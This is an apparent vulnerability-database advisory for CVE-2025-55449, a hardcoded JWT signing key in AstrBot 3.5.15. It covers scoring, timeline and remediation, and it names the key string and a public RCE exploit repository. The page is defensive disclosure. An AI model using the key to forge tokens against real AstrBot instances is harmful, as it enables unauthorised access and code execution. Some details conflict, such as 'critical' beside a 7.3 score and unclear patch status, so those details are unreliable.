What is the CVSS score of CVE-2025-55449?

CVE-2025-55449 has a CVSS 3.1 base score of 7.3 (High). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L. EPSS exploitation probability: 0.0%.

Which versions of AstrBot are affected by CVE-2025-55449?

AstrBot versions 3.5.15 and earlier contain a critical authentication bypass vulnerability allowing unauthenticated remote attackers to forge JWT tokens using a hardcoded private key, leading to…. A patch is available.

How to fix or mitigate CVE-2025-55449?

Within 24 hours: Identify all AstrBot instances in production using network scanning and asset management tools; immediately isolate or restrict network access to any version 3.5.15 or earlier. Within 7 days: Upgrade all affected AstrBot installations to the patched version released by vendor; validate deployment in test environment first. Within 30 days: Conduct full security audit of affected systems for signs of prior exploitation; review authentication logs and JWT usage patterns; implement network segmentation to restrict AstrBot access to authorized users only.

AstrBot CVE-2025-55449

HIGH

Use of Hard-coded Cryptographic Key (CWE-321)

2026-05-08 mitre

GHSA-4m32-cjv7-f425

Information Disclosure

7.3

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

Confidentiality

Low

Integrity

Low

Availability

Low

Lifecycle Timeline

Analysis Generated

May 08, 2026 - 18:22 vuln.today

CVSS changed

May 08, 2026 - 18:22 NVD

7.3 (HIGH)

CVE Published

May 08, 2026 - 00:00 nvd

HIGH 7.3

CVE Published

May 08, 2026 - 00:00 nvd

UNKNOWN (no severity yet)

DescriptionNVD

AstrBotDevs AstrBot 3.5.15 has Advanced_System_for_Text_Response_and_Bot_Operations_Tool as the hardcoded private key used to sign a JWT.

AnalysisAI

Remote unauthenticated attackers can forge JWT authentication tokens in AstrBot 3.5.15 by exploiting a hardcoded private key ('Advanced_System_for_Text_Response_and_Bot_Operations_Tool'), enabling full authentication bypass with subsequent remote code execution capabilities. Public exploit code exists on GitHub (Marven11/CVE-2025-55449-AstrBot-RCE) demonstrating weaponization of this cryptographic flaw. EPSS score of 0.00% suggests limited automated scanning activity, but the availability of working RCE exploit code significantly elevates practical risk for exposed instances.

Technical ContextAI

This vulnerability stems from CWE-321 (Use of Hard-coded Cryptographic Key) in AstrBot's JWT implementation. JSON Web Tokens rely on cryptographic signatures to verify authenticity - the server signs tokens with a private key and validates them on subsequent requests. By embedding the signing key directly in the application source code ('Advanced_System_for_Text_Response_and_Bot_Operations_Tool'), all AstrBot 3.5.15 installations share the same secret. Any attacker who retrieves this key from the public codebase can craft arbitrary JWTs with any identity claims, user roles, or permissions. The bot framework likely uses these tokens for API authentication or administrative access control. The presence of an RCE exploit repository indicates the forged tokens provide access to privileged functions capable of executing system commands.

RemediationAI

Patch available per vendor according to input data, though the AstrBot GitHub repository does not contain a published security advisory or tagged release explicitly addressing CVE-2025-55449 at the referenced URL. Security teams should immediately rotate JWT signing keys to cryptographically random values stored outside application code (environment variables, secrets management systems, or hardware security modules). Until patching is confirmed, implement compensating controls: restrict network access to AstrBot instances using IP allowlisting or VPN requirements, deploy a reverse proxy with rate limiting and anomaly detection for JWT validation endpoints, and monitor authentication logs for suspicious token usage patterns (multiple IPs using identical tokens, tokens with unusual claim structures). For high-risk environments, consider disabling the AstrBot service entirely until vendor confirmation of key rotation in a security-patched release. Each workaround trades functionality - IP allowlisting breaks legitimate remote access, rate limiting may impact high-volume bot operations, and service disabling eliminates availability. Reference the exploit repository at https://github.com/Marven11/CVE-2025-55449-AstrBot-RCE to understand attack signatures for detection rules.

CVE-2025-55449 vulnerability details – vuln.today

Back